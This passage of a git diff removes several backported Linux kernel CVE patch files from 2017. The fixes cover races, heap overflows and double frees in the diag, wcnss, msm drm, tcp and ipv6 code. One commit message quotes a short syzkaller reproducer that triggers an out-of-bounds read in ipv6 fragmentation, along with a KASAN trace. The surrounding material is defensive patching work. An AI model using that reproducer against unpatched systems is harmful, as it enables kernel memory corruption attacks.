-+	for (i = 0; i < driver->bt_msg_mask_tbl_count; i++, build_mask++) {
- 		range.ssid_first = msg_mask_tbl[i].ssid_first;
- 		range.ssid_last = msg_mask_tbl[i].ssid_last;
- 		err = diag_create_msg_mask_table_entry(build_mask, &range);
-@@ -1429,6 +1435,7 @@ static int diag_create_build_time_mask(void)
- 		memcpy(build_mask->ptr, tbl, tbl_size);
- 	}
- 	mutex_unlock(&msg_bt_mask.lock);
-+	mutex_unlock(&driver->msg_mask_lock);
- 
- 	return err;
- }
-@@ -1576,10 +1583,11 @@ static int diag_msg_mask_init(void)
- 		pr_err("diag: Unable to create msg masks, err: %d\n", err);
- 		return err;
- 	}
-+	mutex_lock(&driver->msg_mask_lock);
- 	driver->msg_mask = &msg_mask;
--
- 	for (i = 0; i < NUM_PERIPHERALS; i++)
- 		driver->max_ssid_count[i] = 0;
-+	mutex_unlock(&driver->msg_mask_lock);
- 
- 	return 0;
- }
-@@ -1598,7 +1606,7 @@ int diag_msg_mask_copy(struct diag_mask_info *dest, struct diag_mask_info *src)
- 	err = __diag_mask_init(dest, MSG_MASK_SIZE, APPS_BUF_SIZE);
- 	if (err)
- 		return err;
--
-+	mutex_lock(&driver->msg_mask_lock);
- 	mutex_lock(&dest->lock);
- 	src_mask = (struct diag_msg_mask_t *)src->ptr;
- 	dest_mask = (struct diag_msg_mask_t *)dest->ptr;
-@@ -1617,6 +1625,7 @@ int diag_msg_mask_copy(struct diag_mask_info *dest, struct diag_mask_info *src)
- 		dest_mask++;
- 	}
- 	mutex_unlock(&dest->lock);
-+	mutex_unlock(&driver->msg_mask_lock);
- 
- 	return err;
- }
-@@ -1628,7 +1637,7 @@ void diag_msg_mask_free(struct diag_mask_info *mask_info)
- 
- 	if (!mask_info)
- 		return;
--
-+	mutex_lock(&driver->msg_mask_lock);
- 	mutex_lock(&mask_info->lock);
- 	mask = (struct diag_msg_mask_t *)mask_info->ptr;
- 	for (i = 0; i < driver->msg_mask_tbl_count; i++, mask++) {
-@@ -1636,7 +1645,7 @@ void diag_msg_mask_free(struct diag_mask_info *mask_info)
- 		mask->ptr = NULL;
- 	}
- 	mutex_unlock(&mask_info->lock);
--
-+	mutex_unlock(&driver->msg_mask_lock);
- 	__diag_mask_exit(mask_info);
- }
- 
-@@ -1644,15 +1653,17 @@ static void diag_msg_mask_exit(void)
- {
- 	int i;
- 	struct diag_msg_mask_t *mask = NULL;
--
-+	mutex_lock(&driver->msg_mask_lock);
- 	mask = (struct diag_msg_mask_t *)(msg_mask.ptr);
- 	if (mask) {
- 		for (i = 0; i < driver->msg_mask_tbl_count; i++, mask++)
- 			kfree(mask->ptr);
- 		kfree(msg_mask.ptr);
-+		msg_mask.ptr = NULL;
- 	}
--
- 	kfree(msg_mask.update_buf);
-+	msg_mask.update_buf = NULL;
-+	mutex_unlock(&driver->msg_mask_lock);
- }
- 
- static int diag_build_time_mask_init(void)
-@@ -1677,13 +1688,15 @@ static void diag_build_time_mask_exit(void)
- {
- 	int i;
- 	struct diag_msg_mask_t *mask = NULL;
--
-+	mutex_lock(&driver->msg_mask_lock);
- 	mask = (struct diag_msg_mask_t *)(msg_bt_mask.ptr);
- 	if (mask) {
--		for (i = 0; i < driver->msg_mask_tbl_count; i++, mask++)
-+		for (i = 0; i < driver->bt_msg_mask_tbl_count; i++, mask++)
- 			kfree(mask->ptr);
--		kfree(msg_mask.ptr);
-+		kfree(msg_bt_mask.ptr);
-+		msg_bt_mask.ptr = NULL;
- 	}
-+	mutex_unlock(&driver->msg_mask_lock);
- }
- 
- static int diag_log_mask_init(void)
-@@ -1801,7 +1814,7 @@ int diag_copy_to_user_msg_mask(char __user *buf, size_t count,
- 		return -EIO;
- 	}
- 	mutex_unlock(&driver->diag_maskclear_mutex);
--
-+	mutex_lock(&driver->msg_mask_lock);
- 	mutex_lock(&mask_info->lock);
- 	mask = (struct diag_msg_mask_t *)(mask_info->ptr);
- 	for (i = 0; i < driver->msg_mask_tbl_count; i++, mask++) {
-@@ -1840,7 +1853,7 @@ int diag_copy_to_user_msg_mask(char __user *buf, size_t count,
- 		total_len += len;
- 	}
- 	mutex_unlock(&mask_info->lock);
--
-+	mutex_unlock(&driver->msg_mask_lock);
- 	return err ? err : total_len;
- }
- 
-diff --git a/drivers/char/diag/diagchar.h b/drivers/char/diag/diagchar.h
-index b17538a..4047a2c 100644
---- a/drivers/char/diag/diagchar.h
-+++ b/drivers/char/diag/diagchar.h
-@@ -627,8 +627,10 @@ struct diagchar_dev {
- 	struct diag_mask_info *event_mask;
- 	struct diag_mask_info *build_time_mask;
- 	uint8_t msg_mask_tbl_count;
-+	uint8_t bt_msg_mask_tbl_count;
- 	uint16_t event_mask_size;
- 	uint16_t last_event_id;
-+	struct mutex msg_mask_lock;
- 	/* Variables for Mask Centralization */
- 	uint16_t num_event_id[NUM_PERIPHERALS];
- 	uint32_t num_equip_id[NUM_PERIPHERALS];
-diff --git a/drivers/char/diag/diagchar_core.c b/drivers/char/diag/diagchar_core.c
-index 682c035..afba265 100644
---- a/drivers/char/diag/diagchar_core.c
-+++ b/drivers/char/diag/diagchar_core.c
-@@ -3568,6 +3568,7 @@ static int __init diagchar_init(void)
- 	mutex_init(&driver->diag_file_mutex);
- 	mutex_init(&driver->delayed_rsp_mutex);
- 	mutex_init(&apps_data_mutex);
-+	mutex_init(&driver->msg_mask_lock);
- 	for (i = 0; i < NUM_PERIPHERALS; i++)
- 		mutex_init(&driver->diagfwd_channel_mutex[i]);
- 	mutex_init(&driver->diagfwd_untag_mutex);
-diff --git a/drivers/char/diag/diagfwd_cntl.c b/drivers/char/diag/diagfwd_cntl.c
-index 82a67f1..729fbf4 100644
---- a/drivers/char/diag/diagfwd_cntl.c
-+++ b/drivers/char/diag/diagfwd_cntl.c
-@@ -548,6 +548,7 @@ static void process_ssid_range_report(uint8_t *buf, uint32_t len,
- 	/* Don't account for pkt_id and length */
- 	read_len += header_len - (2 * sizeof(uint32_t));
- 
-+	mutex_lock(&driver->msg_mask_lock);
- 	driver->max_ssid_count[peripheral] = header->count;
- 	for (i = 0; i < header->count && read_len < len; i++) {
- 		ssid_range = (struct diag_ssid_range_t *)ptr;
-@@ -591,6 +592,7 @@ static void process_ssid_range_report(uint8_t *buf, uint32_t len,
- 		}
- 		driver->msg_mask_tbl_count += 1;
- 	}
-+	mutex_unlock(&driver->msg_mask_lock);
- }
- 
- static void diag_build_time_mask_update(uint8_t *buf,
-@@ -615,11 +617,11 @@ static void diag_build_time_mask_update(uint8_t *buf,
- 		       __func__, range->ssid_first, range->ssid_last);
- 		return;
- 	}
--
-+	mutex_lock(&driver->msg_mask_lock);
- 	build_mask = (struct diag_msg_mask_t *)(driver->build_time_mask->ptr);
- 	num_items = range->ssid_last - range->ssid_first + 1;
- 
--	for (i = 0; i < driver->msg_mask_tbl_count; i++, build_mask++) {
-+	for (i = 0; i < driver->bt_msg_mask_tbl_count; i++, build_mask++) {
- 		if (build_mask->ssid_first != range->ssid_first)
- 			continue;
- 		found = 1;
-@@ -638,7 +640,7 @@ static void diag_build_time_mask_update(uint8_t *buf,
- 
- 	if (found)
- 		goto end;
--	new_size = (driver->msg_mask_tbl_count + 1) *
-+	new_size = (driver->bt_msg_mask_tbl_count + 1) *
- 		   sizeof(struct diag_msg_mask_t);
- 	temp = krealloc(driver->build_time_mask->ptr, new_size, GFP_KERNEL);
- 	if (!temp) {
-@@ -653,8 +655,9 @@ static void diag_build_time_mask_update(uint8_t *buf,
- 		       __func__, err);
- 		goto end;
- 	}
--	driver->msg_mask_tbl_count += 1;
-+	driver->bt_msg_mask_tbl_count += 1;
- end:
-+	mutex_unlock(&driver->msg_mask_lock);
- 	return;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8280/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8280/ANY/0001.patch
deleted file mode 100644
index b598d592..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8280/ANY/0001.patch
+++ /dev/null
@@ -1,191 +0,0 @@
-From 49b9a02eaaeb0b70608c6fbcadff7d83833b9614 Mon Sep 17 00:00:00 2001
-From: Sarada Prasanna Garnayak <sgarna@codeaurora.org>
-Date: Mon, 17 Apr 2017 14:29:57 +0530
-Subject: wcnss: fix the potential memory leak and heap overflow
-
-The wcnss platform driver update the wlan calibration data
-by the user space wlan daemon. The wlan user space daemon store
-the updated wlan calibration data reported by wlan firmware in
-user space and write it back to the wcnss platform calibration
-data buffer for the calibration data download and update.
-
-During the wlan calibration data store and retrieve operation
-there are some potential race condition which leads to memory leak
-and buffer overflow during the context switch.
-
-Fix the above issue by adding protection code and avoid usage of
-global pointer during the device file read and write operation.
-
-CRs-Fixed: 2015858
-Change-Id: Ib5b57eb86dcb4e6ed799b5222d06396eaabfaad3
-Signed-off-by: Sarada Prasanna Garnayak <sgarna@codeaurora.org>
----
- drivers/net/wireless/wcnss/wcnss_wlan.c | 87 +++++++++++++++++++--------------
- 1 file changed, 51 insertions(+), 36 deletions(-)
-
-diff --git a/drivers/net/wireless/wcnss/wcnss_wlan.c b/drivers/net/wireless/wcnss/wcnss_wlan.c
-index 11ba537..3171a40 100644
---- a/drivers/net/wireless/wcnss/wcnss_wlan.c
-+++ b/drivers/net/wireless/wcnss/wcnss_wlan.c
-@@ -396,7 +396,6 @@ static struct {
- 	int	user_cal_available;
- 	u32	user_cal_rcvd;
- 	int	user_cal_exp_size;
--	int	device_opened;
- 	int	iris_xo_mode_set;
- 	int	fw_vbatt_state;
- 	char	wlan_nv_macAddr[WLAN_MAC_ADDR_SIZE];
-@@ -3284,14 +3283,6 @@ static int wcnss_node_open(struct inode *inode, struct file *file)
- 			return -EFAULT;
- 	}
- 
--	mutex_lock(&penv->dev_lock);
--	penv->user_cal_rcvd = 0;
--	penv->user_cal_read = 0;
--	penv->user_cal_available = false;
--	penv->user_cal_data = NULL;
--	penv->device_opened = 1;
--	mutex_unlock(&penv->dev_lock);
--
- 	return rc;
- }
- 
-@@ -3300,7 +3291,7 @@ static ssize_t wcnss_wlan_read(struct file *fp, char __user
- {
- 	int rc = 0;
- 
--	if (!penv || !penv->device_opened)
-+	if (!penv)
- 		return -EFAULT;
- 
- 	rc = wait_event_interruptible(penv->read_wait, penv->fw_cal_rcvd
-@@ -3337,55 +3328,66 @@ static ssize_t wcnss_wlan_write(struct file *fp, const char __user
- 			*user_buffer, size_t count, loff_t *position)
- {
- 	int rc = 0;
--	u32 size = 0;
-+	char *cal_data = NULL;
- 
--	if (!penv || !penv->device_opened || penv->user_cal_available)
-+	if (!penv || penv->user_cal_available)
- 		return -EFAULT;
- 
--	if (penv->user_cal_rcvd == 0 && count >= 4
--			&& !penv->user_cal_data) {
--		rc = copy_from_user((void *)&size, user_buffer, 4);
--		if (!size || size > MAX_CALIBRATED_DATA_SIZE) {
--			pr_err(DEVICE " invalid size to write %d\n", size);
-+	if (!penv->user_cal_rcvd && count >= 4 && !penv->user_cal_exp_size) {
-+		mutex_lock(&penv->dev_lock);
-+		rc = copy_from_user((void *)&penv->user_cal_exp_size,
-+				    user_buffer, 4);
-+		if (!penv->user_cal_exp_size ||
-+		    penv->user_cal_exp_size > MAX_CALIBRATED_DATA_SIZE) {
-+			pr_err(DEVICE " invalid size to write %d\n",
-+			       penv->user_cal_exp_size);
-+			penv->user_cal_exp_size = 0;
-+			mutex_unlock(&penv->dev_lock);
- 			return -EFAULT;
- 		}
--
--		rc += count;
--		count -= 4;
--		penv->user_cal_exp_size =  size;
--		penv->user_cal_data = kmalloc(size, GFP_KERNEL);
--		if (penv->user_cal_data == NULL) {
--			pr_err(DEVICE " no memory to write\n");
--			return -ENOMEM;
--		}
--		if (0 == count)
--			goto exit;
--
--	} else if (penv->user_cal_rcvd == 0 && count < 4)
-+		mutex_unlock(&penv->dev_lock);
-+		return count;
-+	} else if (!penv->user_cal_rcvd && count < 4) {
- 		return -EFAULT;
-+	}
- 
-+	mutex_lock(&penv->dev_lock);
- 	if ((UINT32_MAX - count < penv->user_cal_rcvd) ||
- 		(penv->user_cal_exp_size < count + penv->user_cal_rcvd)) {
- 		pr_err(DEVICE " invalid size to write %zu\n", count +
- 				penv->user_cal_rcvd);
--		rc = -ENOMEM;
--		goto exit;
-+		mutex_unlock(&penv->dev_lock);
-+		return -ENOMEM;
- 	}
--	rc = copy_from_user((void *)penv->user_cal_data +
--			penv->user_cal_rcvd, user_buffer, count);
--	if (0 == rc) {
-+
-+	cal_data = kmalloc(count, GFP_KERNEL);
-+	if (!cal_data) {
-+		mutex_unlock(&penv->dev_lock);
-+		return -ENOMEM;
-+	}
-+
-+	rc = copy_from_user(cal_data, user_buffer, count);
-+	if (!rc) {
-+		memcpy(penv->user_cal_data + penv->user_cal_rcvd,
-+		       cal_data, count);
- 		penv->user_cal_rcvd += count;
- 		rc += count;
- 	}
-+
-+	kfree(cal_data);
- 	if (penv->user_cal_rcvd == penv->user_cal_exp_size) {
- 		penv->user_cal_available = true;
- 		pr_info_ratelimited("wcnss: user cal written");
- 	}
-+	mutex_unlock(&penv->dev_lock);
- 
--exit:
- 	return rc;
- }
- 
-+static int wcnss_node_release(struct inode *inode, struct file *file)
-+{
-+	return 0;
-+}
- 
- static int wcnss_notif_cb(struct notifier_block *this, unsigned long code,
- 				void *ss_handle)
-@@ -3444,6 +3446,7 @@ static const struct file_operations wcnss_node_fops = {
- 	.open = wcnss_node_open,
- 	.read = wcnss_wlan_read,
- 	.write = wcnss_wlan_write,
-+	.release = wcnss_node_release,
- };
- 
- static struct miscdevice wcnss_misc = {
-@@ -3471,6 +3474,13 @@ wcnss_wlan_probe(struct platform_device *pdev)
- 	}
- 	penv->pdev = pdev;
- 
-+	penv->user_cal_data =
-+		devm_kzalloc(&pdev->dev, MAX_CALIBRATED_DATA_SIZE, GFP_KERNEL);
-+	if (!penv->user_cal_data) {
-+		dev_err(&pdev->dev, "Failed to alloc memory for cal data.\n");
-+		return -ENOMEM;
-+	}
-+
- 	/* register sysfs entries */
- 	ret = wcnss_create_sysfs(&pdev->dev);
- 	if (ret) {
-@@ -3491,6 +3501,11 @@ wcnss_wlan_probe(struct platform_device *pdev)
- 	mutex_init(&penv->pm_qos_mutex);
- 	init_waitqueue_head(&penv->read_wait);
- 
-+	penv->user_cal_rcvd = 0;
-+	penv->user_cal_read = 0;
-+	penv->user_cal_exp_size = 0;
-+	penv->user_cal_available = false;
-+
- 	/* Since we were built into the kernel we'll be called as part
- 	 * of kernel initialization.  We don't know if userspace
- 	 * applications are available to service PIL at this time
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8281/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-8281/3.18/0001.patch
deleted file mode 100644
index 93ed6a1d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8281/3.18/0001.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From 9be5b16de622c2426408425e3df29e945cd21d37 Mon Sep 17 00:00:00 2001
-From: Kasin Li <donglil@codeaurora.org>
-Date: Wed, 22 Feb 2017 18:25:36 +0800
-Subject: drm/msm: Fix potential buffer overflow issue
-
-In function submit_create, if nr_cmds or nr_bos is assigned with
-negative value, the allocated buffer may be small than intended.
-Using this buffer will lead to buffer overflow issue.
-
-Change-Id: I0b61cccffd836e2dd3c859446470af4b6451b9ed
-Signed-off-by: Kasin Li <donglil@codeaurora.org>
----
- drivers/gpu/drm/msm/msm_gem_submit.c | 7 +++++--
- 1 file changed, 5 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/gpu/drm/msm/msm_gem_submit.c b/drivers/gpu/drm/msm/msm_gem_submit.c
-index adbb0cb..fa9b641 100644
---- a/drivers/gpu/drm/msm/msm_gem_submit.c
-+++ b/drivers/gpu/drm/msm/msm_gem_submit.c
-@@ -34,12 +34,15 @@ static inline void __user *to_user_ptr(u64 address)
- }
- 
- static struct msm_gem_submit *submit_create(struct drm_device *dev,
--		struct msm_gpu *gpu, int nr_cmds, int nr_bos)
-+		struct msm_gpu *gpu, uint32_t nr_cmds, uint32_t nr_bos)
- {
- 	struct msm_gem_submit *submit;
--	int sz = sizeof(*submit) + (nr_bos * sizeof(submit->bos[0])) +
-+	uint64_t sz = sizeof(*submit) + (nr_bos * sizeof(submit->bos[0])) +
- 		(nr_cmds * sizeof(submit->cmd[0]));
- 
-+	if (sz > SIZE_MAX)
-+		return NULL;
-+
- 	submit = kmalloc(sz, GFP_TEMPORARY | __GFP_NOWARN | __GFP_NORETRY);
- 	if (submit) {
- 		submit->dev = dev;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8281/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-8281/4.4/0002.patch
deleted file mode 100644
index 7d248fb1..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8281/4.4/0002.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From 9b209c4552779edb86221787fb8681dd212e3a0c Mon Sep 17 00:00:00 2001
-From: Mohit Aggarwal <maggarwa@codeaurora.org>
-Date: Sat, 22 Apr 2017 10:49:18 +0530
-Subject: diag: dci: Add protection while querying event status
-
-Currently, protection is missing when querying event
-status due to which already removed dci client entry
-might be accessed. This patch takes care of issue by
-taking proper locking.
-
-CRs-Fixed: 2015892
-Change-Id: I4195c4c6198d85e96559f1728d74419527a76bc5
-Signed-off-by: Mohit Aggarwal <maggarwa@codeaurora.org>
----
- drivers/char/diag/diagchar_core.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/drivers/char/diag/diagchar_core.c b/drivers/char/diag/diagchar_core.c
-index 574a13d..9a5f196 100644
---- a/drivers/char/diag/diagchar_core.c
-+++ b/drivers/char/diag/diagchar_core.c
-@@ -2336,7 +2336,9 @@ long diagchar_ioctl(struct file *filp,
- 		mutex_unlock(&driver->dci_mutex);
- 		break;
- 	case DIAG_IOCTL_DCI_EVENT_STATUS:
-+		mutex_lock(&driver->dci_mutex);
- 		result = diag_ioctl_dci_event_status(ioarg);
-+		mutex_unlock(&driver->dci_mutex);
- 		break;
- 	case DIAG_IOCTL_DCI_CLEAR_LOGS:
- 		mutex_lock(&driver->dci_mutex);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8890/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2017-8890/3.10/0002.patch
deleted file mode 100644
index adc039a1..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8890/3.10/0002.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From 1853870b216d3446efd39190a8ff0006c54dfd46 Mon Sep 17 00:00:00 2001
-From: Eric Dumazet <edumazet@google.com>
-Date: Tue, 9 May 2017 06:29:19 -0700
-Subject: [PATCH] BACKPORT: dccp/tcp: do not inherit mc_list from parent
-
-syzkaller found a way to trigger double frees from ip_mc_drop_socket()
-
-It turns out that leave a copy of parent mc_list at accept() time,
-which is very bad.
-
-Very similar to commit 8b485ce69876 ("tcp: do not inherit
-fastopen_req from parent")
-
-Initial report from Pray3r, completed by Andrey one.
-Thanks a lot to them !
-
-Signed-off-by: Eric Dumazet <edumazet@google.com>
-Reported-by: Pray3r <pray3r.z@gmail.com>
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Tested-by: Andrey Konovalov <andreyknvl@google.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
-Signed-off-by: Roberto Pereira <rpere@google.com>
-(cherry picked from commit 657831ffc38e30092a2d5f03d385d710eb88b09a)
-Bug:38413975
-Change-Id: Icf89ad025cb8225e806e52c573d68533912111ad
----
- net/ipv4/inet_connection_sock.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/net/ipv4/inet_connection_sock.c b/net/ipv4/inet_connection_sock.c
-index 64198a381ddca..008b52bc99a3d 100644
---- a/net/ipv4/inet_connection_sock.c
-+++ b/net/ipv4/inet_connection_sock.c
-@@ -697,6 +697,8 @@ struct sock *inet_csk_clone_lock(const struct sock *sk,
- 		inet_sk(newsk)->inet_sport = inet_rsk(req)->loc_port;
- 		newsk->sk_write_space = sk_stream_write_space;
- 
-+		inet_sk(newsk)->mc_list = NULL;
-+
- 		newsk->sk_mark = inet_rsk(req)->ir_mark;
- 
- 		newicsk->icsk_retransmits = 0;
diff --git a/Patches/Linux_CVEs/CVE-2017-8890/3.4/0001.patch b/Patches/Linux_CVEs/CVE-2017-8890/3.4/0001.patch
deleted file mode 100644
index f2e74280..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8890/3.4/0001.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-From f52d6739f6a67cf1c918a4557e88b519b9135930 Mon Sep 17 00:00:00 2001
-From: Eric Dumazet <edumazet@google.com>
-Date: Tue, 09 May 2017 06:29:19 -0700
-Subject: [PATCH] dccp/tcp: do not inherit mc_list from parent
-
-syzkaller found a way to trigger double frees from ip_mc_drop_socket()
-
-It turns out that leave a copy of parent mc_list at accept() time,
-which is very bad.
-
-Very similar to commit 8b485ce69876 ("tcp: do not inherit
-fastopen_req from parent")
-
-Initial report from Pray3r, completed by Andrey one.
-Thanks a lot to them !
-
-Change-Id: I2eac7b825a5b597af14a0573b76b685131c46726
-Signed-off-by: Eric Dumazet <edumazet@google.com>
-Reported-by: Pray3r <pray3r.z@gmail.com>
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Tested-by: Andrey Konovalov <andreyknvl@google.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
-
-diff --git a/net/ipv4/inet_connection_sock.c b/net/ipv4/inet_connection_sock.c
-index fb10d58..325edfe 100644
---- a/net/ipv4/inet_connection_sock.c
-+++ b/net/ipv4/inet_connection_sock.c
-@@ -618,6 +618,8 @@
- 		inet_sk(newsk)->inet_sport = inet_rsk(req)->loc_port;
- 		newsk->sk_write_space = sk_stream_write_space;
- 
-+		inet_sk(newsk)->mc_list = NULL;
-+
- 		newsk->sk_mark = inet_rsk(req)->ir_mark;
- 
- 		newicsk->icsk_retransmits = 0;
diff --git a/Patches/Linux_CVEs/CVE-2017-8890/3.4/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-8890/3.4/0001.patch.base64
deleted file mode 100644
index 8f12cd9d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8890/3.4/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSBmNTJkNjczOWY2YTY3Y2YxYzkxOGE0NTU3ZTg4YjUxOWI5MTM1OTMwIE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBFcmljIER1bWF6ZXQgPGVkdW1hemV0QGdvb2dsZS5jb20+CkRhdGU6IFR1ZSwgMDkgTWF5IDIwMTcgMDY6Mjk6MTkgLTA3MDAKU3ViamVjdDogW1BBVENIXSBkY2NwL3RjcDogZG8gbm90IGluaGVyaXQgbWNfbGlzdCBmcm9tIHBhcmVudAoKc3l6a2FsbGVyIGZvdW5kIGEgd2F5IHRvIHRyaWdnZXIgZG91YmxlIGZyZWVzIGZyb20gaXBfbWNfZHJvcF9zb2NrZXQoKQoKSXQgdHVybnMgb3V0IHRoYXQgbGVhdmUgYSBjb3B5IG9mIHBhcmVudCBtY19saXN0IGF0IGFjY2VwdCgpIHRpbWUsCndoaWNoIGlzIHZlcnkgYmFkLgoKVmVyeSBzaW1pbGFyIHRvIGNvbW1pdCA4YjQ4NWNlNjk4NzYgKCJ0Y3A6IGRvIG5vdCBpbmhlcml0CmZhc3RvcGVuX3JlcSBmcm9tIHBhcmVudCIpCgpJbml0aWFsIHJlcG9ydCBmcm9tIFByYXkzciwgY29tcGxldGVkIGJ5IEFuZHJleSBvbmUuClRoYW5rcyBhIGxvdCB0byB0aGVtICEKCkNoYW5nZS1JZDogSTJlYWM3YjgyNWE1YjU5N2FmMTRhMDU3M2I3NmI2ODUxMzFjNDY3MjYKU2lnbmVkLW9mZi1ieTogRXJpYyBEdW1hemV0IDxlZHVtYXpldEBnb29nbGUuY29tPgpSZXBvcnRlZC1ieTogUHJheTNyIDxwcmF5M3IuekBnbWFpbC5jb20+ClJlcG9ydGVkLWJ5OiBBbmRyZXkgS29ub3ZhbG92IDxhbmRyZXlrbnZsQGdvb2dsZS5jb20+ClRlc3RlZC1ieTogQW5kcmV5IEtvbm92YWxvdiA8YW5kcmV5a252bEBnb29nbGUuY29tPgpTaWduZWQtb2ZmLWJ5OiBEYXZpZCBTLiBNaWxsZXIgPGRhdmVtQGRhdmVtbG9mdC5uZXQ+Ci0tLQoKZGlmZiAtLWdpdCBhL25ldC9pcHY0L2luZXRfY29ubmVjdGlvbl9zb2NrLmMgYi9uZXQvaXB2NC9pbmV0X2Nvbm5lY3Rpb25fc29jay5jCmluZGV4IGZiMTBkNTguLjMyNWVkZmUgMTAwNjQ0Ci0tLSBhL25ldC9pcHY0L2luZXRfY29ubmVjdGlvbl9zb2NrLmMKKysrIGIvbmV0L2lwdjQvaW5ldF9jb25uZWN0aW9uX3NvY2suYwpAQCAtNjE4LDYgKzYxOCw4IEBACiAJCWluZXRfc2sobmV3c2spLT5pbmV0X3Nwb3J0ID0gaW5ldF9yc2socmVxKS0+bG9jX3BvcnQ7CiAJCW5ld3NrLT5za193cml0ZV9zcGFjZSA9IHNrX3N0cmVhbV93cml0ZV9zcGFjZTsKIAorCQlpbmV0X3NrKG5ld3NrKS0+bWNfbGlzdCA9IE5VTEw7CisKIAkJbmV3c2stPnNrX21hcmsgPSBpbmV0X3JzayhyZXEpLT5pcl9tYXJrOwogCiAJCW5ld2ljc2stPmljc2tfcmV0cmFuc21pdHMgPSAwOwo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-8890/^4.11/0003.patch b/Patches/Linux_CVEs/CVE-2017-8890/^4.11/0003.patch
deleted file mode 100644
index 5a46f955..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8890/^4.11/0003.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From 657831ffc38e30092a2d5f03d385d710eb88b09a Mon Sep 17 00:00:00 2001
-From: Eric Dumazet <edumazet@google.com>
-Date: Tue, 9 May 2017 06:29:19 -0700
-Subject: dccp/tcp: do not inherit mc_list from parent
-
-syzkaller found a way to trigger double frees from ip_mc_drop_socket()
-
-It turns out that leave a copy of parent mc_list at accept() time,
-which is very bad.
-
-Very similar to commit 8b485ce69876 ("tcp: do not inherit
-fastopen_req from parent")
-
-Initial report from Pray3r, completed by Andrey one.
-Thanks a lot to them !
-
-Signed-off-by: Eric Dumazet <edumazet@google.com>
-Reported-by: Pray3r <pray3r.z@gmail.com>
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Tested-by: Andrey Konovalov <andreyknvl@google.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/ipv4/inet_connection_sock.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/net/ipv4/inet_connection_sock.c b/net/ipv4/inet_connection_sock.c
-index 5e313c1..1054d33 100644
---- a/net/ipv4/inet_connection_sock.c
-+++ b/net/ipv4/inet_connection_sock.c
-@@ -794,6 +794,8 @@ struct sock *inet_csk_clone_lock(const struct sock *sk,
- 		/* listeners have SOCK_RCU_FREE, not the children */
- 		sock_reset_flag(newsk, SOCK_RCU_FREE);
- 
-+		inet_sk(newsk)->mc_list = NULL;
-+
- 		newsk->sk_mark = inet_rsk(req)->ir_mark;
- 		atomic64_set(&newsk->sk_cookie,
- 			     atomic64_read(&inet_rsk(req)->ir_cookie));
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9074/3.2/0001.patch b/Patches/Linux_CVEs/CVE-2017-9074/3.2/0001.patch
deleted file mode 100644
index b95d9264..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9074/3.2/0001.patch
+++ /dev/null
@@ -1,229 +0,0 @@
-From ad8a4d9d3f255a783d534a47d4b4ac611bb291d8 Mon Sep 17 00:00:00 2001
-From: Craig Gallek <kraig@google.com>
-Date: Tue, 16 May 2017 14:36:23 -0400
-Subject: ipv6: Prevent overrun when parsing v6 header options
-
-commit 2423496af35d94a87156b063ea5cedffc10a70a1 upstream.
-
-The KASAN warning repoted below was discovered with a syzkaller
-program.  The reproducer is basically:
-  int s = socket(AF_INET6, SOCK_RAW, NEXTHDR_HOP);
-  send(s, &one_byte_of_data, 1, MSG_MORE);
-  send(s, &more_than_mtu_bytes_data, 2000, 0);
-
-The socket() call sets the nexthdr field of the v6 header to
-NEXTHDR_HOP, the first send call primes the payload with a non zero
-byte of data, and the second send call triggers the fragmentation path.
-
-The fragmentation code tries to parse the header options in order
-to figure out where to insert the fragment option.  Since nexthdr points
-to an invalid option, the calculation of the size of the network header
-can made to be much larger than the linear section of the skb and data
-is read outside of it.
-
-This fix makes ip6_find_1stfrag return an error if it detects
-running out-of-bounds.
-
-[   42.361487] ==================================================================
-[   42.364412] BUG: KASAN: slab-out-of-bounds in ip6_fragment+0x11c8/0x3730
-[   42.365471] Read of size 840 at addr ffff88000969e798 by task ip6_fragment-oo/3789
-[   42.366469]
-[   42.366696] CPU: 1 PID: 3789 Comm: ip6_fragment-oo Not tainted 4.11.0+ #41
-[   42.367628] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.1-1ubuntu1 04/01/2014
-[   42.368824] Call Trace:
-[   42.369183]  dump_stack+0xb3/0x10b
-[   42.369664]  print_address_description+0x73/0x290
-[   42.370325]  kasan_report+0x252/0x370
-[   42.370839]  ? ip6_fragment+0x11c8/0x3730
-[   42.371396]  check_memory_region+0x13c/0x1a0
-[   42.371978]  memcpy+0x23/0x50
-[   42.372395]  ip6_fragment+0x11c8/0x3730
-[   42.372920]  ? nf_ct_expect_unregister_notifier+0x110/0x110
